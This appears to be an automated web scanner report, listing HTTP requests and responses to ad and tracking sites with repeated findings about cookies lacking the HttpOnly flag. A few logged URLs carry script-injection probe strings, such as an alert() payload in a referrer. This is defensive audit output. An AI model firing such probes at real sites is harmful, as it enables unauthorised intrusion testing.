GET /feed-icon-28x28.png HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Referer: http://blog.supermedia.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; mbox=session#1296759528614-838261#1296763697|check#true#1296761897
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feed/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:13 GMT Server: Unspecified Connection: close Content-Type: text/xml Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /feed/atom/ HTTP/1.1 Host: blog.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:47:13 GMT Server: Unspecified Connection: close Content-Type: text/xml Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:02:13 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /main.css HTTP/1.1 Host: blog.supermedia.com Proxy-Connection: keep-alive Referer: http://blog.supermedia.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:32:04 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=f09ac1e2ccf2b58a:TM=1296765124:LM=1296765124:S=VHIb6cqmET3q7qwK; expires=Sat, 02-Feb-2013 20:32:04 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:31:57 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=6552b75bb12891c4:TM=1296765117:LM=1296765117:S=z2Yh1vRAeMtxN6LI; expires=Sat, 02-Feb-2013 20:31:57 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?pixid=99004680 HTTP/1.1 Host: bp.specificclick.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: adp=7CUZ^0^8191; smdmp=7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; adf=7CUZ^0^0; ug=uosDj9Liw_xRTA
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate Cache-Control: post-check=0,pre-check=0 Pragma: no-cache p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: adp=7CUZ^0^8191; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: smdmp=7CVs:99004680^7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: adf=7CUZ^0^0; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=z3WgCNenmAIQt6DI6wM&guid=ON&script=0 Content-Type: text/html Content-Length: 0 Date: Thu, 03 Feb 2011 19:03:58 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /buzz HTTP/1.1 Host: buzz.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:35:40 GMT Set-Cookie: B=fjoviv16km0sc&b=3&s=eo; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: of01e2=08556806c2aa36978721cfcb146d3d49; path=/; domain=buzz.yahoo.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private Pragma: no-cache Location: http://login.yahoo.com/?.pd=c%3DhYw09vWp2e4FXlpTB9bd0rU-&.src=ybz&.intl=us&.done=http%3A%2F%2Fbuzz.yahoo.com%2Fvote%2F Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83
<!-- fe13.buzz.re1.yahoo.com uncompressed/chunked Thu Feb 3 11:35:40 PST 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&RedC=c.msn.com&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: c.redcated Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&MUID=AD04D6F8B2FF44629973BD0674351135 Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Tue, 23-Aug-2011 02:29:39 GMT; path=/; Date: Fri, 04 Feb 2011 02:29:38 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/285974183/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_PreRollCompanion P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296770644-3981256; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=5F36AEF5D4FB49DB9F81F864E31B34FC; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=c003d4d/243a7/110b9ea7/af02/4d4b2654; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Thu, 03 Feb 2011 22:04:03 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/286182932/direct/01/]] HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_WonderPreRoll P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296770649-3995471; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=8EE4F442F1FB4932AD6D6003B4E01B9A; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bcab411/243a7/110ece14/af02/4d4b2659; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Thu, 03 Feb 2011 22:04:08 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adServer/adServerESI.aspx HTTP/1.1 Host: core.insightexpressai.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 Content-Length: 18 Content-Type: text/html; charset=utf-8 Set-Cookie: DW=221e32e71296770758; expires=Wed, 29-Jan-2031 22:05:58 GMT; path=/; domain=insightexpressai.com P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Expires: Thu, 03 Feb 2011 22:05:58 GMT Pragma: no-cache Date: Thu, 03 Feb 2011 22:05:58 GMT Connection: close Cache-Control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /save HTTP/1.1 Host: delicious.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 03 Feb 2011 19:35:43 GMT Set-Cookie: BX=ab7m0op6km0sf&b=3&s=10; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.delicious.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://www.delicious.com/save Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private Age: 0 Connection: close Server: YTS/1.19.4
The document has moved <A HREF="http://www.delicious.com/save">here</A>.<P> <!-- fe06.web.del.ac4.yahoo.net uncompressed/chunked Thu Feb 3 19:35:43 UTC 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/ HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:47:44 GMT Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 29638
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/license.html HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:04:29 GMT Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 22172
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 286 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:19 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:19 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842119.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 02:28:36 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Fri, 04 Feb 2011 17:55:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 04 Feb 2011 17:55:19 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ssframework/dt/pt.png?trackcd=1288991585470 HTTP/1.1 Host: dt.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:44 GMT Server: Apache p3p: policyref=/w3c/p3p.xml Set-Cookie: behavioralSegments=29_110203|32_110203|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:44 GMT; Path=/ Content-Length: 101 Connection: close Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quant.js HTTP/1.1 Host: edge.quantserve.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close ETag: "18334:E0-1152220633-1296770771366" Vary: Accept-Encoding Last-Modified: Thu, 03-Feb-2011 22:06:11 GMT Content-Type: application/x-javascript Set-Cookie: mc=4d4b26d3-59834-71bae-edc2f; expires=Thu, 03-Feb-2021 22:06:11 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Fri, 04 Feb 2011 22:06:11 GMT Content-Length: 5265 Date: Thu, 03 Feb 2011 22:06:11 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: googleads.g.doubleclick.net Proxy-Connection: Keep-Alive Cookie: test_cookie=CheckForPermission
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT X-Content-Type-Options: nosniff Date: Fri, 04 Feb 2011 02:36:02 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Expires: Fri, 04 Feb 2011 02:36:02 GMT Content-Length: 5976
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: googleads.g.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net X-Content-Type-Options: nosniff Date: Fri, 04 Feb 2011 02:35:59 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Expires: Fri, 04 Feb 2011 02:35:59 GMT Content-Length: 4758
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clickaider.js HTTP/1.1 Host: hit.clickaider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=4d3f2276-241363738113; clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; vid=3e136b53-42127475201;
Response
HTTP/1.1 200 OK Connection: close P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" Expires: Fri, 04 Feb 2011 20:32:22 GMT Cache-Control: private, max-age=86400 Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT Content-Type: application/x-javascript Content-Length: 9501 Date: Thu, 03 Feb 2011 20:32:22 GMT Server: lighttpd/1.4.18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pv?lng=156&&lnks=&t=Boardreader%20-%20Forum%20Search%20Engine&c=9f671068-5&r=&tz=-360&var1=main%20page&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2F&rnd=5831 HTTP/1.1 Host: hit.clickaider.com Proxy-Connection: keep-alive Referer: http://boardreader.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=3e136b53-42127475201
Response
